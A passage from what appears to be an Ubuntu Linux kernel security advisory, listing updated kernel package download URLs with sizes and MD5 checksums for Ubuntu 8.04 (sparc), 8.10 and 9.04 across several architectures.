http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   270052 0ba83932dbed8aeaf6ddd3a29b692a46\n    http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   190274 e71570e211349110b3e422c4be949ad2\n    http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   262746 5945be1dee0f68cc7c2accaf043bc050\n    http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:  1385732 1e777b3f2817abf6b080c0716332bbd5\n    http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   175218 97800c61086265b7ec2e905295897e5a\n    http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   122096 951902334238b51aa9b172b78962db10\n    http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    40402 c630c56f90c33e2bd29d18af59670427\n    http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    48062 599c33d62648436711413f7d36da2d18\n    http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:     8700 5d3347aa29bdfac095254b435ed40d98\n    http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    60398 53c6a79c562b197f78a7e1fdb4e77e95\n    http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   106764 9889da01d9805293d43cab0fd63ffeec\n    http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:  1001728 2fe7e877334ddd3cf236f6e98f5f46fe\n    http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:     9512 be22a95339bad90349084fa441b1471f\n    http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:   391164 43cbe127ea4d0b428ac38c360e235cb3\n    http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-24-sparc64-di_2.6.24-24.55_sparc.udeb\n      Size/MD5:    75858 d3fd8c3a8134018d37ddc66b7fb0711d\n\nUpdated packages for Ubuntu 8.10:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-14.35.diff.gz\n      Size/MD5:  3181140 f341f37430b19a4815761da90e63e255\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-14.35.dsc\n      Size/MD5:     1491 348bdb8051f6821a99b6e0725c2aca64\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz\n      Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-14.35_all.deb\n      Size/MD5:  3489746 1ff47091f292a7388a12f08f9dc8f8b7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14_2.6.27-14.35_all.deb\n      Size/MD5:  5793886 6b12bcd8a9d7fbb597c13d0aa0d285bf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-14.35_all.deb\n      Size/MD5: 52077688 28412f9128132c91c15915a3d5812093\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    36522 304d150ef4d9a9db9695c2ea3eddf798\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   265178 c0cedca8f9af22d7d35a6f5331e64f46\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    53460 164d97bf182cdc710089336701669026\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    43068 27182ab8ec89343ddb1acaadb79d20a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    52322 615253a966a6cfb75cde1ea2e74cdcfb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    89740 8ed1b79d7e290f7bf3cb49f50907e370\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    38172 56c5bfbb21825a4fa74292c63532e201\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   676692 265d0d3fd047797b08261901f3cb50d1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   158538 b27457d63fe234182a931c857b64d242\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    46344 f4e9b955dc853195fd05ecae5f140794\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   154248 ad469c83e50590ada6c4b399a6d69854\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   312772 95e8ea1f4626ae7ced5c93597fbd8af0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:  2602274 23d7c86bd8d4ad26d754b97a428b74d4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-generic_2.6.27-14.35_amd64.deb\n      Size/MD5:   660580 6c6df3fe5e9f36c47392b8df503fb996\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-server_2.6.27-14.35_amd64.deb\n      Size/MD5:   660584 05bb6f130a1faac0e47c59a64cb59e41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-generic_2.6.27-14.35_amd64.deb\n      Size/MD5: 23065618 fe985c117c3b6faee48830f64cabf971\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-server_2.6.27-14.35_amd64.deb\n      Size/MD5: 23071172 a9d6617828de879a1ef4a68610f06e43\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-virtual_2.6.27-14.35_amd64.deb\n      Size/MD5: 10464288 f91fdb8992629a5ae82cbcb2d383b8e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-14.35_amd64.deb\n      Size/MD5:   673298 fe94d2d76e3a5dce812d7d8a597637a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   434636 6fe6ed3dc5c57e5a876f2c6c6c7fbb88\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   186386 338f1bad9040bf0c78ee9397de9398b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   275414 4a5d4c3690aedd96e3eee3d922d73728\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:  1809338 6afa319ea3d9f91e4d16629b86afb1b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   151300 cdf306368201a053d740b4d77bf62c02\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   194010 d7ed2a96bbd6dcfa75c163511c8b4f7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   168054 27dbc834cddb14ce830806e769efb0b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    36432 95637deca9859881af3edf3db8e06ccc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    83440 e97ed7ed724ca8c518927601f6b433b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    71986 1c4c570c1fe15e5cebad90d8a93cf70f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    23240 ebaa5d5263395e8517ea82ae3b92ddfc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:     9012 f865b88210a4c54d8fdc79a9cfbdf4a0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    68492 6994b7e19338405c0e127924e67e516d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   110292 8e81e11a44a41f94fef4dff4e59e3da3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:  1275410 34848383b66939762660048e268e8441\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    47594 9181c757204f49f4d0dac390e83f02a4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    13480 a51476c745872d0858d9b7033a64ea9f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   393508 9500d323c74c9a330c85183c1686ff49\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:   200788 c5ed4008f970210bb982f80cbce591e4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-14-generic-di_2.6.27-14.35_amd64.udeb\n      Size/MD5:    13620 2fc4b4f188f9218932d0490308507835\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    33922 f40a1e72d099b64c586a6db641443044\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   244642 b720012479a1cbe6ba08d28302584fc9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    55394 90c1f139ebe83c6d6d8b1a1fc1061297\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    41218 c1b7874af183c54e95df8d57557aa7c0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    48654 dfb3c0359053a662017fd9dea0f840ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    86896 3e594eaa10f4598f2c050daf5ee208e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    34058 c5f4fc9d0f61e279e0f6a9b351545b27\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   675184 eac37d6873c317fec9dbc41af85ce84f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   158298 fdb6996d620940e986f9e809a1061414\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    43598 8d56f44e1e6c01610509b5cdc9ea5f42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   145120 47f331154c2773e7861a63965661123a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   301946 d7980f5869e46243a45b37625ad61afe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:  2435224 46b565365b11d793768f04f50a4c248b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-generic_2.6.27-14.35_i386.deb\n      Size/MD5:   643392 3e61d3633116618454601e745e24a863\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-14-server_2.6.27-14.35_i386.deb\n      Size/MD5:   644726 37a677e1e3004e6b42d0958beeb0fda7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-generic_2.6.27-14.35_i386.deb\n      Size/MD5: 23478050 04856487eac811aebdd2a30416889f40\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-server_2.6.27-14.35_i386.deb\n      Size/MD5: 23600374 2b9a4093fbdd02dbd054cbe8ca2384f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-14-virtual_2.6.27-14.35_i386.deb\n      Size/MD5: 10108412 0d4c0bd4e94cac0ea3b384b6b1d29cb5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-14.35_i386.deb\n      Size/MD5:   673308 dc76499e326c2f5c2e10b547241ed770\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   432904 836dfe4f7fd217c3d6b4e50ee27ff5ec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   171144 e01935798941dc8722f25c9e499d7dba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   263706 ad942f31cb448980c110c5d65b4c5938\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:  1993126 9e48f8f227a345c72ae76263b3acc41e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   150922 d45e54c03e6524f7409d8ffe6ccbc1fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   183850 26ff7871dda8a29516eb04951e395500\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   157722 7cefa9c1e1abd9574daa5a2732c8d43b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    34498 a323c4253a702888a9ee866bafcac9e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    78252 3306e0596c6ec6a941906ec5cf1b5896\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    86172 14f820994a04b74bacc55f908ced747a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    51176 929ace31f9151a14f646711b57141335\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:     8794 c6ff3050c0e8d61f69978e3a64f3afc0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    64308 ab5438618e09f3747c9cabe4d2202d42\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   102010 d66cf8423068745b1896a2d37087ea57\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:  1449250 cc24f0d8b7411f15f0b3704c92c73719\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    44514 0763f6eeda9cf0971a5145eeca31a37b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    12642 4142729eb596aefe6b55a3c91b537aa7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   372528 2ec016366a3c65b130470af25b4f4cd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:   189698 577f8d2648589a2620fe4917bcd90e4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.27-14-generic-di_2.6.27-14.35_i386.udeb\n      Size/MD5:    12992 aaf90b0f25f26915752e0d01ffdf1404\n\nUpdated packages for Ubuntu 9.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-13.45.diff.gz\n      Size/MD5:  7052018 c30f6c12f534fb270e77a8db16658c00\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28-13.45.dsc\n      Size/MD5:     1988 c31e8f14e5353913483bcbe5134a221a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.28.orig.tar.gz\n      Size/MD5: 66766084 062c29b626a55f09a65532538a6184d4\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.28_2.6.28-13.45_all.deb\n      Size/MD5:  3630660 dff37123aa2a0a01813aaafa113efeaa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13_2.6.28-13.45_all.deb\n      Size/MD5:  8694158 d568990611704c5022f17a406bba56da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.28_2.6.28-13.45_all.deb\n      Size/MD5: 56896726 2218180442fe2265c4a383718103d24b\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   234530 8ca4ab91f04156b591af5e036a9d9eaf\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    44110 3d35edf87a693b4aec248c4e110db223\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    43326 8b5f1e9917275cb49fd5cdc5fe7c372c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    51102 a1b090802ce4589182c26704db51e79a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    89946 692cdd4f68027d91736aee9507a279a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    37992 40f149752511e8e7d4b527bd321f5f61\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   521610 a346bd312d8eed61e8bb96fb59f3b9b9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   125632 86429c19731c1bbc4fc7025d4659f4e0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    58050 dbb7ceb698b6e40a9429b35804416265\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   312206 2bd5e6bd4338e51c72d349a40a24afb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:  3867978 7532ceaadca5ac062476c9a058e87f87\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-generic_2.6.28-13.45_amd64.deb\n      Size/MD5:   684590 ce636ed44071caf1eb5696a5b4cd3d52\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-server_2.6.28-13.45_amd64.deb\n      Size/MD5:   684602 67c72e9124b19974c39f55341d293d4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-generic_2.6.28-13.45_amd64.deb\n      Size/MD5: 24250596 54189eb7095f154663e12fcbd03e3052\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-server_2.6.28-13.45_amd64.deb\n      Size/MD5: 24255096 11079badc74f668bfa9299a94eee9500\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-virtual_2.6.28-13.45_amd64.deb\n      Size/MD5: 10522290 889f00238ab9579a1a3787b6f4093bba\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_amd64.deb\n      Size/MD5:   761032 20f696493a51b361c8211cd3a99773a3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   215158 e7434a687dec03b384f88e8e86870b2d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   189390 cd7116d69deef0ccd449097583b27125\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    29396 de5e69d2393ad59f85a530a3a1076f03\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   274128 a4bb104369c8be8748a38ec66a6649b1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:  1826044 25d1a4452606ab450f214afd2c6da482\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   163490 edffca1a4f08889ab04638134e70bdfa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   194758 84976648caa181490b9c748f7672e20c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   152946 38f0b1e429efc2993fb2f0346daf98d2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    36490 09b7bf2b970fab395adc80da34772183\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:     5842 6a537fc3a2af29ba6fd981ce8b2b19f0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    72132 2416b9382cc51b3b1c424d52bbf379b0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    22716 d5f4dc6ca66de6c6044e2fcfcf9783c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:     8878 58927a3e2b4abbb9a3e0e19c969b701a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    47470 8cd84b96c9d3b1e32b3e7d29042b4a91\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    15622 5b3599e51e3513f458430702ba57410a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:  1272842 175bd4440eb113fa0b72b1c3897457c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    47218 3bf3faa60421de087af2696985c361eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    72626 f431e2290ae3347326ff8b3fc5b5bf98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:   126946 c82470ee359a4f8d7879367739e73f1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-13-generic-di_2.6.28-13.45_amd64.udeb\n      Size/MD5:    13472 0299bdd96f706adde62bcbf1fe873527\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:   215716 af09e22b5eededba6f06bbce4b6f7f6e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    46662 cbb33d90c53ae6c5a277c9f4402188e1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    41344 c369ce39d1595df751bf81a7ca1d4831\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    47378 092cfe8af282c15f332902a0295fe1b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb\n      Size/MD5:    86848 c2b5e966fc9e4476ab1b6c6fde5bb7a5\n    